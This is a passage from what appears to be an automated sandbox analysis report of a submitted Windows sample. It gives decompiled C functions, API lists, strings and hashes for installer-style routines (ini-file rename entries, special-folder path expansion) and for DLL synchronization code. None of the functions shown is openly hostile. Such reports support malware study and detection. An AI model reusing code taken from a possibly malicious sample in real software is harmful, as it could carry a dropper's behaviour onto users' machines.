                • Opcode ID: cae46454919e7fa79772e51e967b3c1ae0100adcfe078b8b521791772386bd0b
                • Instruction ID: 81ce27436f0092abe3ce3185f2c65b9207eacd25275343976a1476a18aae1cf1
                • Opcode Fuzzy Hash: cae46454919e7fa79772e51e967b3c1ae0100adcfe078b8b521791772386bd0b
                • Instruction Fuzzy Hash: 06418B71804249AFCB058F95DD459AFBBB9FF44315F00802AF961AA2A0C738EA51DFA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004058E6, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144filememoryCOMMON
                Download Yara Rule
                C-Code - Quality: 93%
                			E004058E6(void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				intOrPtr _t18;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00405F28(2);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x423fd0 =  *0x423fd0 + 1;
						return _t20;
					}
				}
				 *0x4226c8 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x422140, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x421d40, "%s=%s\r\n", 0x4226c8, 0x422140);
						_t18 =  *0x423f50; // 0x4e0f60
						_t56 = _t55 + 0x10;
						E00405BBA(_t43, 0x400, 0x422140, 0x422140,  *((intOrPtr*)(_t18 + 0x128)));
						_t20 = E0040586F(0x422140, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E004057E4(_t51, "[Rename]\r\n") != 0) {
								_t28 = E004057E4(_t26 + 0xa, 0x4093e4);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E00405830(_t51 + _t29, 0x421d40, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E00405B98(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E0040586F(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x4226c8, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}






















                0x004058ec
                0x004058f3
                0x004058f7
                0x00405900
                0x00405904
                0x00405a43
                0x00405a43
                0x00000000
                0x00405a43
                0x00405904
                0x00405910
                0x00405926
                0x0040594e
                0x00405959
                0x0040595d
                0x0040597d
                0x0040597f
                0x00405984
                0x0040598e
                0x0040599b
                0x004059a0
                0x004059a5
                0x004059a9
                0x00000000
                0x00000000
                0x004059b8
                0x004059ba
                0x004059c7
                0x004059cb
                0x00405a3c
                0x00405a3d
                0x00000000
                0x004059e7
                0x004059f4
                0x00405a59
                0x00405a60
                0x00405a07
                0x00405a07
                0x00405a09
                0x00405a12
                0x00405a1d
                0x00405a2f
                0x00405a36
                0x00000000
                0x00405a36
                0x00405a62
                0x00405a63
                0x00405a68
                0x00405a6a
                0x00405a77
                0x00405a77
                0x00405a7b
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00405a6c
                0x00405a6c
                0x00405a6f
                0x00405a72
                0x00405a73
                0x00000000
                0x00405a6c
                0x004059ff
                0x00405a04
                0x00000000
                0x00405a04
                0x004059cb
                0x00405928
                0x00405933
                0x0040593c
                0x00405940
                0x00000000
                0x00000000
                0x00405940
                0x00405a4d

                APIs
                  • Part of subcall function 00405F28: GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                  • Part of subcall function 00405F28: GetProcAddress.KERNEL32(00000000,?), ref: 00405F55
                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000002,?,00000000,?,?,0040567B,?,00000000,000000F1,?), ref: 00405933
                • GetShortPathNameA.KERNEL32 ref: 0040593C
                • GetShortPathNameA.KERNEL32 ref: 00405959
                • wsprintfA.USER32 ref: 00405977
                • GetFileSize.KERNEL32(00000000,00000000,00422140,C0000000,00000004,00422140,?,?,?,00000000,000000F1,?), ref: 004059B2
                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004059C1
                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 004059D7
                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421D40,00000000,-0000000A,004093E4,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405A1D
                • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405A2F
                • GlobalFree.KERNEL32 ref: 00405A36
                • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405A3D
                  • Part of subcall function 004057E4: lstrlenA.KERNEL32(00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057EB
                  • Part of subcall function 004057E4: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581B
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.263609418.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.263603207.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263627006.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263631692.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263647032.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263653995.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263661513.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263668333.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263691098.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeModulePointerProcReadSizeWritewsprintf
                • String ID: %s=%s$@!B$[Rename]
                • API String ID: 3445103937-2946522640
                • Opcode ID: ba6dd0a96c47d1f42225f0131925257862b6081e9796f2b12c44a8ffad6b8124
                • Instruction ID: 3fdb6a032fd62a2424e34f1ba2115feadd67922d203a780a084708b988c1bb31
                • Opcode Fuzzy Hash: ba6dd0a96c47d1f42225f0131925257862b6081e9796f2b12c44a8ffad6b8124
                • Instruction Fuzzy Hash: C8410231B01B167BD7206B619D89F6B3A5CEF44755F04013AFD05F62D2E67CA8008EAD
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF817D0, Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 66synchronizationCOMMON
                Download Yara Rule
                C-Code - Quality: 89%
                			E6FF817D0(intOrPtr* _a4) {
				intOrPtr* _v8;
				void* _v12;

				_v8 = _a4;
				0x6ff80000("%p\n", _a4);
				EnterCriticalSection(0x6ff850ac);
				if(_v8 == 0 ||  *_v8 != 0x50444830) {
					LeaveCriticalSection(0x6ff850ac);
					return 0xc0000bbc;
				} else {
					if( *(_v8 + 8) == 0) {
						L7:
						E6FF82C70(_v8);
						LeaveCriticalSection(0x6ff850ac);
						return 0;
					}
					_v12 =  *(_v8 + 8);
					SetEvent( *(_v8 + 0x14));
					LeaveCriticalSection(0x6ff850ac);
					WaitForSingleObject(_v12, 0xffffffff);
					EnterCriticalSection(0x6ff850ac);
					if( *_v8 == 0x50444830) {
						CloseHandle( *(_v8 + 0x14));
						CloseHandle( *(_v8 + 8));
						 *(_v8 + 8) = 0;
						goto L7;
					}
					LeaveCriticalSection(0x6ff850ac);
					return 0;
				}
			}





                0x6ff817d9
                0x6ff817e5
                0x6ff817f2
                0x6ff817fc
                0x6ff8180e
                0x00000000
                0x6ff8181e
                0x6ff81825
                0x6ff8189d
                0x6ff818a1
                0x6ff818ae
                0x00000000
                0x6ff818b4
                0x6ff8182d
                0x6ff81837
                0x6ff81842
                0x6ff8184e
                0x6ff81859
                0x6ff81868
                0x6ff81880
                0x6ff8188d
                0x6ff81896
                0x00000000
                0x6ff81896
                0x6ff8186f
                0x00000000
                0x6ff81875

                APIs
                • EnterCriticalSection.KERNEL32(6FF850AC), ref: 6FF817F2
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF8180E
                • SetEvent.KERNEL32(?), ref: 6FF81837
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF81842
                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 6FF8184E
                • EnterCriticalSection.KERNEL32(6FF850AC), ref: 6FF81859
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF8186F
                • CloseHandle.KERNEL32(?), ref: 6FF81880
                • CloseHandle.KERNEL32(?), ref: 6FF8188D
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF818AE
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.265700956.000000006FF81000.00000020.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000000.00000002.265685733.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.265732809.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.265754390.000000006FF85000.00000040.00020000.sdmp Download File
                • Associated: 00000000.00000002.265772810.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CriticalSection$Leave$CloseEnterHandle$EventObjectSingleWait
                • String ID: %p$0HDP$0HDP$p-w
                • API String ID: 549566651-945182506
                • Opcode ID: 3526ad1a7a896d7b7547e9bcb5f31e24576d866e190a1aef4fa4a46a66e01423
                • Instruction ID: 71e4a87e95f6ba6d2cc2665507ea2afcdc4fa5f2683748addafc097dbdd4c64d
                • Opcode Fuzzy Hash: 3526ad1a7a896d7b7547e9bcb5f31e24576d866e190a1aef4fa4a46a66e01423
                • Instruction Fuzzy Hash: 2C215C75910108EFCB00DFE4D549AAE7BB5BF4A321F208294F5229B350DB31AE50CB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405BBA, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 197stringCOMMON
                Download Yara Rule
                C-Code - Quality: 74%
                			E00405BBA(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t36;
				CHAR* _t37;
				signed int _t39;
				int _t40;
				char _t50;
				char _t51;
				char _t53;
				char _t55;
				void* _t63;
				signed int _t69;
				intOrPtr _t73;
				signed int _t74;
				signed int _t75;
				intOrPtr _t79;
				char _t83;
				void* _t85;
				CHAR* _t86;
				void* _t88;
				signed int _t95;
				signed int _t97;
				void* _t98;

				_t88 = __esi;
				_t85 = __edi;
				_t63 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t79 =  *0x42371c; // 0x4e7cf3
					_t36 =  *(_t79 - 4 + _t36 * 4);
				}
				_t73 =  *0x423f78; // 0x4e6194
				_t74 = _t73 + _t36;
				_t37 = 0x422ee0;
				_push(_t63);
				_push(_t88);
				_push(_t85);
				_t86 = 0x422ee0;
				if(_a4 - 0x422ee0 < 0x800) {
					_t86 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t83 =  *_t74;
					if(_t83 == 0) {
						break;
					}
					__eflags = _t86 - _t37 - 0x400;
					if(_t86 - _t37 >= 0x400) {
						break;
					}
					_t74 = _t74 + 1;
					__eflags = _t83 - 0xfc;
					_a8 = _t74;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t86 = _t83;
							_t86 =  &(_t86[1]);
							__eflags = _t86;
						} else {
							 *_t86 =  *_t74;
							_t86 =  &(_t86[1]);
							_t74 = _t74 + 1;
						}
						continue;
					}
					_t39 =  *(_t74 + 1);
					_t75 =  *_t74;
					_t95 = (_t39 & 0x0000007f) << 0x00000007 | _t75 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t75 | 0x00000080;
					_t69 = _t75;
					_v24 = _t69;
					__eflags = _t83 - 0xfe;
					_v20 = _t39 | 0x00000080;
					_v16 = _t39;
					if(_t83 != 0xfe) {
						__eflags = _t83 - 0xfd;
						if(_t83 != 0xfd) {
							__eflags = _t83 - 0xff;
							if(_t83 == 0xff) {
								__eflags = (_t39 | 0xffffffff) - _t95;
								E00405BBA(_t69, _t86, _t95, _t86, (_t39 | 0xffffffff) - _t95);
							}
							L41:
							_t40 = lstrlenA(_t86);
							_t74 = _a8;
							_t86 =  &(_t86[_t40]);
							_t37 = 0x422ee0;
							continue;
						}
						__eflags = _t95 - 0x1d;
						if(_t95 != 0x1d) {
							__eflags = (_t95 << 0xa) + 0x425000;
							E00405B98(_t86, (_t95 << 0xa) + 0x425000);
						} else {
							E00405AF6(_t86,  *0x423f48);
						}
						__eflags = _t95 + 0xffffffeb - 7;
						if(_t95 + 0xffffffeb < 7) {
							L32:
							E00405DFA(_t86);
						}
						goto L41;
					}
					_t97 = 2;
					_t50 = GetVersion();
					__eflags = _t50;
					if(_t50 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x423fc4;
						if( *0x423fc4 != 0) {
							_t97 = 4;
						}
						__eflags = _t69;
						if(_t69 >= 0) {
							__eflags = _t69 - 0x25;
							if(_t69 != 0x25) {
								__eflags = _t69 - 0x24;
								if(_t69 == 0x24) {
									GetWindowsDirectoryA(_t86, 0x400);
									_t97 = 0;
								}
								while(1) {
									__eflags = _t97;
									if(_t97 == 0) {
										goto L29;
									}
									_t51 =  *0x423f44; // 0x73b41340
									_t97 = _t97 - 1;
									__eflags = _t51;
									if(_t51 == 0) {
										L25:
										_t53 = SHGetSpecialFolderLocation( *0x423f48,  *(_t98 + _t97 * 4 - 0x18),  &_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											L27:
											 *_t86 =  *_t86 & 0x00000000;
											__eflags =  *_t86;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t86);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t55 =  *_t51( *0x423f48,  *(_t98 + _t97 * 4 - 0x18), 0, 0, _t86);
									__eflags = _t55;
									if(_t55 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t86, 0x400);
							goto L29;
						} else {
							_t72 = (_t69 & 0x0000003f) +  *0x423f78;
							E00405A7F(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t69 & 0x0000003f) +  *0x423f78, _t86, _t69 & 0x00000040);
							__eflags =  *_t86;
							if( *_t86 != 0) {
								L30:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t86, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
							E00405BBA(_t72, _t86, _t97, _t86, _v16);
							L29:
							__eflags =  *_t86;
							if( *_t86 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t50 - 0x5a04;
					if(_t50 == 0x5a04) {
						goto L12;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L12;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t86 =  *_t86 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E00405B98(_a4, _t37);
			}






























                0x00405bba
                0x00405bba
                0x00405bba
                0x00405bc0
                0x00405bc5
                0x00405bc7
                0x00405bd6
                0x00405bd6
                0x00405bd8
                0x00405be1
                0x00405be3
                0x00405be8
                0x00405beb
                0x00405bec
                0x00405bf3
                0x00405bf5
                0x00405bfb
                0x00405bfe
                0x00405bfe
                0x00405dd7
                0x00405dd7
                0x00405ddb
                0x00000000
                0x00000000
                0x00405c0b
                0x00405c11
                0x00000000
                0x00000000
                0x00405c17
                0x00405c18
                0x00405c1b
                0x00405c1e
                0x00405dca
                0x00405dd4
                0x00405dd6
                0x00405dd6
                0x00405dcc
                0x00405dce
                0x00405dd0
                0x00405dd1
                0x00405dd1
                0x00000000
                0x00405dca
                0x00405c24
                0x00405c28
                0x00405c38
                0x00405c3c
                0x00405c43
                0x00405c46
                0x00405c4a
                0x00405c50
                0x00405c53
                0x00405c56
                0x00405c59
                0x00405d74
                0x00405d77
                0x00405da7
                0x00405daa
                0x00405daf
                0x00405db3
                0x00405db3
                0x00405db8
                0x00405db9
                0x00405dbe
                0x00405dc1
                0x00405dc3
                0x00000000
                0x00405dc3
                0x00405d79
                0x00405d7c
                0x00405d91
                0x00405d98
                0x00405d7e
                0x00405d85
                0x00405d85
                0x00405da0
                0x00405da3
                0x00405d6c
                0x00405d6d
                0x00405d6d
                0x00000000
                0x00405da3
                0x00405c61
                0x00405c62
                0x00405c68
                0x00405c6a
                0x00405c84
                0x00405c84
                0x00405c8b
                0x00405c8b
                0x00405c92
                0x00405c96
                0x00405c96
                0x00405c97
                0x00405c99
                0x00405cd2
                0x00405cd5
                0x00405ce5
                0x00405ce8
                0x00405cf0
                0x00405cf6
                0x00405cf6
                0x00405d52
                0x00405d52
                0x00405d54
                0x00000000
                0x00000000
                0x00405cfa
                0x00405d01
                0x00405d02
                0x00405d04
                0x00405d1e
                0x00405d2c
                0x00405d32
                0x00405d34
                0x00405d4f
                0x00405d4f
                0x00405d4f
                0x00000000
                0x00405d4f
                0x00405d3a
                0x00405d45
                0x00405d4b
                0x00405d4d
                0x00000000
                0x00000000
                0x00000000
                0x00405d4d
                0x00405d06
                0x00405d09
                0x00000000
                0x00000000
                0x00405d18
                0x00405d1a
                0x00405d1c
                0x00000000
                0x00000000
                0x00000000
                0x00405d1c
                0x00000000
                0x00405d52
                0x00405cdd
                0x00000000
                0x00405c9b
                0x00405ca0
                0x00405cb6
                0x00405cbb
                0x00405cbe
                0x00405d5b
                0x00405d5b
                0x00405d5f
                0x00405d67
                0x00405d67
                0x00000000
                0x00405d5f
                0x00405cc8
                0x00405d56
                0x00405d56
                0x00405d59
                0x00000000
                0x00000000
                0x00000000
                0x00405d59
                0x00405c99
                0x00405c6c
                0x00405c70
                0x00000000
                0x00000000
                0x00405c72
                0x00405c76
                0x00000000
                0x00000000
                0x00405c78
                0x00405c7c
                0x00000000
                0x00405c7e
                0x00405c7e
                0x00000000
                0x00405c7e
                0x00405c7c
                0x00405de1
                0x00405deb
                0x00405df7
                0x00405df7
                0x00000000

                APIs
                • GetVersion.KERNEL32(00000000,0041FD10,00000000,00404EBC,0041FD10,00000000), ref: 00405C62
                • GetSystemDirectoryA.KERNEL32 ref: 00405CDD
                • GetWindowsDirectoryA.KERNEL32(ymvwfuvwx,00000400), ref: 00405CF0
                • SHGetSpecialFolderLocation.SHELL32(?,0040F0E0), ref: 00405D2C
                • SHGetPathFromIDListA.SHELL32(0040F0E0,ymvwfuvwx), ref: 00405D3A
                • CoTaskMemFree.OLE32(0040F0E0), ref: 00405D45
                • lstrcatA.KERNEL32(ymvwfuvwx,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D67
                • lstrlenA.KERNEL32(ymvwfuvwx,00000000,0041FD10,00000000,00404EBC,0041FD10,00000000), ref: 00405DB9
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.263609418.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.263603207.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263627006.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263631692.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263647032.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263653995.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263661513.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263668333.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263691098.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$ymvwfuvwx
                • API String ID: 900638850-2619486982
                • Opcode ID: 722f7ba73d7118e4ab3b6bf0c831072dc3c77b8f74574a686c3719bf3172466b
                • Instruction ID: c09fc2b2839bb59ef3d9b0e1161cb0e194e2e056f91f07e7f33828596fbb00b3
                • Opcode Fuzzy Hash: 722f7ba73d7118e4ab3b6bf0c831072dc3c77b8f74574a686c3719bf3172466b
                • Instruction Fuzzy Hash: CE51F331A04A05AAEF215F648C88BBF3B74EF05714F10827BE911B62E0D27C5942DF5E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF82EC0, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 46threadsynchronizationCOMMON
                Download Yara Rule
                C-Code - Quality: 92%
                			E6FF82EC0(intOrPtr* _a4) {
				intOrPtr* _v8;
				long _v12;
				void* _v16;
				void* _t29;

				_v8 = _a4;
				_v12 =  *((intOrPtr*)(_v8 + 0xc));
				_v16 =  *((intOrPtr*)(_v8 + 0x14));
				while(WaitForSingleObject(_v16, _v12) == 0x102) {
					EnterCriticalSection(0x6ff850ac);
					if( *_v8 == 0x50444830) {
						_push(_v8);
						E6FF82EB0(_t18);
						_t29 = _t29 + 4;
						if(SetEvent( *(_v8 + 0x10)) != 0) {
							LeaveCriticalSection(0x6ff850ac);
							continue;
						}
						LeaveCriticalSection(0x6ff850ac);
						ExitThread(0);
					}
					LeaveCriticalSection(0x6ff850ac);
					ExitThread(0xc0000bbc);
				}
				ExitThread(0);
			}







                0x6ff82ec9
                0x6ff82ed2
                0x6ff82edb
                0x6ff82ede
                0x6ff82f00
                0x6ff82f0f
                0x6ff82f2a
                0x6ff82f2b
                0x6ff82f30
                0x6ff82f42
                0x6ff82f5c
                0x00000000
                0x6ff82f5c
                0x6ff82f49
                0x6ff82f51
                0x6ff82f51
                0x6ff82f16
                0x6ff82f21
                0x6ff82f21
                0x6ff82ef5

                APIs
                • WaitForSingleObject.KERNEL32(?,?), ref: 6FF82EE6
                • ExitThread.KERNEL32 ref: 6FF82EF5
                • EnterCriticalSection.KERNEL32(6FF850AC), ref: 6FF82F00
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF82F16
                • ExitThread.KERNEL32 ref: 6FF82F21
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.265700956.000000006FF81000.00000020.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000000.00000002.265685733.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.265732809.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.265754390.000000006FF85000.00000040.00020000.sdmp Download File
                • Associated: 00000000.00000002.265772810.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CriticalExitSectionThread$EnterLeaveObjectSingleWait
                • String ID: 0HDP$p-w
                • API String ID: 1874301155-3830501846
                • Opcode ID: 90c20fecb2358fadc54298708bfb05b606c4c678fde9d25b6d2e778e6d14fff0
                • Instruction ID: f4264583adce84eda402ce997af3b95af4ddd08ab9722d497e959978e990e2a7
                • Opcode Fuzzy Hash: 90c20fecb2358fadc54298708bfb05b606c4c678fde9d25b6d2e778e6d14fff0
                • Instruction Fuzzy Hash: F2113C7AA10604EFCB04DFE4C549A6E7BB9BF4A311F214098F52697350DB31AA50DB51
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF81C40, Relevance: 13.6, APIs: 6, Strings: 3, Instructions: 80COMMON
                Download Yara Rule
                C-Code - Quality: 82%
                			E6FF81C40(void* __ecx, intOrPtr* _a4, signed char _a8, int* _a12, void* _a16) {
				intOrPtr* _v8;

				_v8 = _a4;
				0x6ff80000("%p %d %p %p\n", _a4, _a8 & 0x000000ff, _a12, _a16, __ecx);
				EnterCriticalSection(0x6ff850ac);
				if(_v8 == 0 ||  *_v8 != 0x50444831) {
					LeaveCriticalSection(0x6ff850ac);
					return 0xc0000bbc;
				} else {
					if(_a12 != 0) {
						if( *_a12 >= 0x48) {
							memset(_a16, 0, 0x48);
							 *((intOrPtr*)(_a16 + 4)) =  *((intOrPtr*)(_v8 + 8));
							 *((intOrPtr*)(_a16 + 0xc)) =  *((intOrPtr*)(_v8 + 0xc));
							 *((intOrPtr*)(_a16 + 0x10)) =  *((intOrPtr*)(_v8 + 0x10));
							 *((intOrPtr*)(_a16 + 0x14)) =  *((intOrPtr*)(_v8 + 0x14));
							 *((intOrPtr*)(_a16 + 0x18)) =  *((intOrPtr*)(_v8 + 0x18));
							 *((intOrPtr*)(_a16 + 0x1c)) =  *((intOrPtr*)(_v8 + 0x1c));
							 *_a12 = 0x48;
							LeaveCriticalSection(0x6ff850ac);
							return 0;
						}
						 *_a12 = 0x48;
						LeaveCriticalSection(0x6ff850ac);
						return 0x800007d2;
					}
					LeaveCriticalSection(0x6ff850ac);
					return 0xc0000bbd;
				}
			}




                0x6ff81c47
                0x6ff81c60
                0x6ff81c6d
                0x6ff81c77
                0x6ff81c89
                0x00000000
                0x6ff81c99
                0x6ff81c9d
                0x6ff81cba
                0x6ff81cdf
                0x6ff81cf0
                0x6ff81cfc
                0x6ff81d08
                0x6ff81d14
                0x6ff81d20
                0x6ff81d2c
                0x6ff81d32
                0x6ff81d3d
                0x00000000
                0x6ff81d43
                0x6ff81cbf
                0x6ff81cca
                0x00000000
                0x6ff81cd0
                0x6ff81ca4
                0x00000000
                0x6ff81caa

                APIs
                • EnterCriticalSection.KERNEL32(6FF850AC), ref: 6FF81C6D
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF81C89
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF81CA4
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF81CCA
                • memset.MSVCRT ref: 6FF81CDF
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF81D3D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.265700956.000000006FF81000.00000020.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000000.00000002.265685733.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.265732809.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.265754390.000000006FF85000.00000040.00020000.sdmp Download File
                • Associated: 00000000.00000002.265772810.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CriticalSection$Leave$Entermemset
                • String ID: %p %d %p %p$1HDP$p-w
                • API String ID: 2581898777-2455463802
                • Opcode ID: bd2cd142d1bd3dc1a2029987f741d39e6c4ebda0376af2b1899dbe036140048e
                • Instruction ID: 7fbcc722d051a8f12852a4e71a99731a150f8dc2b8744c78af989262f8faa46a
                • Opcode Fuzzy Hash: bd2cd142d1bd3dc1a2029987f741d39e6c4ebda0376af2b1899dbe036140048e
                • Instruction Fuzzy Hash: 3831F5B9600209DFCB04CF88C684A9E7BF1BF49314F218199F8269B351D735ED11CBA2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF81B30, Relevance: 13.6, APIs: 6, Strings: 3, Instructions: 80COMMON
                Download Yara Rule
                C-Code - Quality: 82%
                			E6FF81B30(void* __ecx, intOrPtr* _a4, signed char _a8, int* _a12, void* _a16) {
				intOrPtr* _v8;

				_v8 = _a4;
				0x6ff80000("%p %d %p %p\n", _a4, _a8 & 0x000000ff, _a12, _a16, __ecx);
				EnterCriticalSection(0x6ff850ac);
				if(_v8 == 0 ||  *_v8 != 0x50444831) {
					LeaveCriticalSection(0x6ff850ac);
					return 0xc0000bbc;
				} else {
					if(_a12 != 0) {
						if( *_a12 >= 0x48) {
							memset(_a16, 0, 0x48);
							 *((intOrPtr*)(_a16 + 4)) =  *((intOrPtr*)(_v8 + 8));
							 *((intOrPtr*)(_a16 + 0xc)) =  *((intOrPtr*)(_v8 + 0xc));
							 *((intOrPtr*)(_a16 + 0x10)) =  *((intOrPtr*)(_v8 + 0x10));
							 *((intOrPtr*)(_a16 + 0x14)) =  *((intOrPtr*)(_v8 + 0x14));
							 *((intOrPtr*)(_a16 + 0x18)) =  *((intOrPtr*)(_v8 + 0x18));
							 *((intOrPtr*)(_a16 + 0x1c)) =  *((intOrPtr*)(_v8 + 0x1c));
							 *_a12 = 0x48;
							LeaveCriticalSection(0x6ff850ac);
							return 0;
						}
